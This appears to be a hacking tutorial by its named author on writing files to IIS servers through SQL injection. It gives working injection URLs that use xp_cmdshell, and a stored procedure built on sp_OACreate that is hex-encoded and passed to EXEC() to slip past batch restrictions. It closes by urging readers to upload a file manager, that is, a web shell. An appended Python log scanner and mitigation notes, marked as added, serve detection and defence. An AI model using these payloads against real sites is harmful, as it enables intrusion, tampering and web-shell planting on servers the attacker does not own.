In the Name of ALLAH the most beneficent and the Merciful

Uploading files to IIS servers through SQL injection was something of a myth to me, even when the injected user is an admin and we know the path as well. There are ways to write files with xp_cmdshell, but it is not enabled on every SQL Server, for security reasons, and it is not enabled by default. After I read these articles

I learned that there is a way to write files even when xp_cmdshell is not enabled. In this article I will show you both ways of writing files.

1. With xp_cmdShell

It is pretty easy when you have access to xp_cmdshell.

First, create the file with:

site.com/page.aspx?id=1;exec master..xp_cmdshell 'type nul>path\filename.ext'-- -

e.g.

site.com/page.aspx?id=1;exec master..xp_cmdshell 'type NUL>D:\sites\site.com\httpdocs\rummykhan.txt'-- -

This creates an empty file. Now we need to write contents into it:

site.com/page.aspx?id=1;exec master..xp_cmdshell 'echo rummykhan was here!!>D:\sites\site.com\httpdocs\rummykhan.txt'-- -

And you're done; the file is written on the server.

2. With File System Objects

Here is the complete procedure code which I used:

  • https://www.simple-talk.com/code/WorkingWithFiles/spWriteStringTofile.txt (by Phil Factor)

I just customized it for my needs, to avoid the URL length problem, and it became something like this:

Shortened code: I just renamed the variables and removed the error-handling syntax, as we don't need those during SQL injection.

CREATE PROCEDURE FcUk(@st Varchar(max), @p VARCHAR(255), @fn VARCHAR(100))
AS
DECLARE @ofs int, @ots int, @oeo int, @sem Varchar(1000), @cmd varchar(1000), @hr int, @fnp varchar(80)
set nocount on
select @sem = 'o'
-- @ofs receives the Scripting.FileSystemObject COM object
EXECUTE @hr = sp_OACreate 'Scripting.FileSystemObject', @ofs OUT
Select @fnp = @p + '\' + @fn
if @HR = 0 Select @oeo = @ofs, @sem = 'Creating file "' + @fnp + '"'
-- CreateTextFile returns a TextStream object in @ots
if @HR = 0 execute @hr = sp_OAMethod @ofs, 'CreateTextFile', @ots OUT, @fnp, 2, True
if @HR = 0 Select @oeo = @ots, @sem = 'wttf "' + @fnp + '"'
if @HR = 0 execute @hr = sp_OAMethod @ots, 'Write', Null, @st
if @HR = 0 Select @oeo = @ots, @sem = 'ctf "' + @fnp + '"'
if @HR = 0 execute @hr = sp_OAMethod @ots, 'Close'
if @hr <> 0
begin
    -- @oeo holds whichever object produced the last non-zero HRESULT
    Declare @Source varchar(255), @Description Varchar(255), @Helpfile Varchar(255), @HelpID int
    EXECUTE sp_OAGetErrorInfo @oeo, @source output, @Description output, @Helpfile output, @HelpID output
end
-- release both COM objects (the original destroyed @ots twice and never released @ofs)
EXECUTE sp_OADestroy @ots
EXECUTE sp_OADestroy @ofs

I just shortened the variable names and removed the error syntax because we don't need these during injection.

At first, when testing, I wrote the same proc in the URL, like:

site.com/page.aspx?id=1;proc syntax here-- -

which failed with the error: 'CREATE/ALTER PROCEDURE' must be the first statement in a query batch.

This is due to a restriction in T-SQL: CREATE PROC must be the first statement when you execute a batch of queries.

So to avoid this I used EXEC(): I hex-encoded the complete proc, passed that to EXEC('complete proc in hex'), and voila, this worked like a charm and created the stored procedure in SQL Server.

Here is the final syntax for creating the stored procedure on SQL Server. I hex-encoded it to avoid any exception from SQL Server about quotation marks and to run things smoothly.

begin
declare @x varchar(MAX)
SET @x = <hex-encoded CREATE PROCEDURE text; elided on the original page>;
EXEC(@x)
end

And we can use it like:

site.com/page.aspx?id=1;above syntax here-- -

The above query will create a stored procedure named FcUk which takes 3 parameters:

1. File contents

2. Full path

3. File name

The next thing is to execute that proc:

site.com/page.aspx?id=1; exec FcUk 'file contents here.','Full path','file name'-- -

e.g.

site.com/page.aspx?id=1; exec FcUk 'rummykhan was here!!','D:\sites\site.com\httpdocs\','rummykhan.txt'-- -

Now access the file and enjoy.

A tiny uploader to avoid the URL length problem

begin
declare @x varchar(MAX)
SET @x = <hex-encoded file contents; elided on the original page>
exec FcUk @x, 'path here', 'filename'
end

Use this syntax like:

site.com/page.aspx?id=1;above uploader syntax here-- -

Then access it and upload your file manager.
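From the defender's side, both techniques in this article leave the same trace: a request whose query string carries xp_cmdshell, or sp_OACreate/sp_OAMethod and a CREATE PROCEDURE wrapped in a hex literal handed to EXEC(). The Python below is an added example, not code from the article; it parses a constructed IIS W3C log (the log format, addresses and paths are made up), URL-decodes each query string until it stops changing (so double encoding does not hide anything), decodes any 0x hex literal back to text, and reports requests that contain one of the indicator names from section 1 or section 2.

```python
"""Detection for the two file-write techniques above (xp_cmdshell, and
sp_OACreate/sp_OAMethod hidden in a hex-encoded EXEC() batch), run over a
constructed IIS W3C log.  Added example; not code from the original article."""
import re
from urllib.parse import unquote_plus

# Procedures and statements a web application never sends on its own; any of
# them in a request query string is an indicator.  "create proc" also matches
# "create procedure".
INDICATORS = (
    "xp_cmdshell",
    "sp_oacreate",
    "sp_oamethod",
    "sp_oadestroy",
    "create proc",
    "sp_configure",
)

# A 0x literal of at least four bytes.  The group captures pairs of hex digits,
# so bytes.fromhex() never sees an odd-length string.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")


def decode_hex_literals(text):
    """Return the text hidden inside every 0x... literal in `text`.

    SET @x = 0x... into a varchar gives one byte per character, so latin-1 is
    the right decoding; an nvarchar payload is UTF-16LE (every second byte is
    zero) and is decoded as such.
    """
    hidden = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if not any(raw[1::2]):
            hidden.append(raw.decode("utf-16-le", errors="replace"))
        else:
            hidden.append(raw.decode("latin-1"))
    return hidden


def normalize_query(query):
    """URL-decode until stable (defeats double encoding), lower-case, and
    append whatever the hex literals decode to.  Returns (text, used_hex)."""
    decoded = query
    for _ in range(3):
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    hidden = decode_hex_literals(decoded)
    return (decoded + " " + " ".join(hidden)).lower(), bool(hidden)


def scan_iis_log(log_text):
    """Parse W3C-format IIS log text and return one finding per request whose
    cs-uri-query carries an indicator, in the clear or inside a hex literal."""
    fields, findings = [], []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the data lines that follow
            continue
        if not line or line.startswith("#"):
            continue
        cols = line.split()
        if len(cols) != len(fields):
            continue                    # malformed line: skip instead of crashing
        row = dict(zip(fields, cols))
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        normalized, used_hex = normalize_query(query)
        hits = [ind for ind in INDICATORS if ind in normalized]
        if hits:
            findings.append({"line": lineno, "client": row.get("c-ip"),
                             "uri": row.get("cs-uri-stem"),
                             "indicators": hits, "hex_decoded": used_hex})
    return findings


# Constructed sample log.  Line 5 hides a CREATE PROC/sp_OACreate stub inside a
# hex literal the way the article's EXEC(@x) trick does; line 7 is
# double-URL-encoded.  Paths and addresses are made up.
_HIDDEN = "CREATE PROC p AS EXECUTE sp_OACreate 'Scripting.FileSystemObject'".encode("latin-1").hex()
SAMPLE_LOG = f"""\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-03-01 10:00:01 10.0.0.5 GET /page.aspx id=1 203.0.113.7 200
2015-03-01 10:00:02 10.0.0.5 GET /page.aspx id=1;exec+master..xp_cmdshell+%27type+NUL%3EC:%5Cinetpub%5Cwwwroot%5Cx.txt%27--+- 203.0.113.7 500
2015-03-01 10:00:03 10.0.0.5 GET /page.aspx id=1;begin+declare+@x+varchar(MAX)+SET+@x=0x{_HIDDEN}+EXEC(@x)+end--+- 203.0.113.7 500
2015-03-01 10:00:04 10.0.0.5 GET /page.aspx id=2&sort=name 203.0.113.9 200
2015-03-01 10:00:05 10.0.0.5 GET /page.aspx id=1%253Bexec%2520master..xp_cmdshell%2520%2527dir%2527 203.0.113.7 500
"""

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

The hex decoding is what makes the second technique visible: without it the request for line 5 looks like an opaque blob and no keyword rule fires. On the server side, the same two facts that make this article work are the mitigation: xp_cmdshell and the Ole Automation Procedures (sp_OACreate and friends) are both disabled by default and both require sysadmin, so a web application login that is not sysadmin cannot use either, and any sp_configure call that turns them on shows up in sys.configurations and the default trace.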

POC

Original video: http://youtu.be/DtWRQG0BaMI

Article by: Rummy Khan (fb/rummykhan)